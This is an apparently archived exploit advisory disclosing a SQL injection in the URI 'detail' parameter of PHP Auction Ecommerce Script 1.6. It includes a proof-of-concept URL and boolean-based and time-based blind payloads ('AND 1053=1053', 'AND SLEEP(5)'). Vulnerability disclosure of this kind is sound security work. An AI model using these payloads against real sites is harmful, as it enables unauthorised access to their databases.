PHP Auction Ecommerce Script 1.6 SQL Injection

PHP Auction Ecommerce Script version 1.6 suffers from a remote SQL injection vulnerability.


MD5 | 1bbb761c85a0eeb2c41619563fcc7584

# Exploit Title: PHP Auction Ecommerce Script v1.6 - SQL Injection
# Date: 2017-09-22
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/php-auction-ecommerce-script/
# Version: 1.6
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: [email protected]
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-22

Product & Service Introduction:
===============================
Start your own Auction website with our Readymade PHP Auction script.

Technical Details & Description:
================================

SQL injection on [detail] URI parameter.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/detail/xx AND 1053=1053/xxxxx

Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: AND 1053=1053/xxxx

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: AND SLEEP(5)/xxxx

==================
8bitsec - [https://twitter.com/_8bitsec]



Related Posts

Comments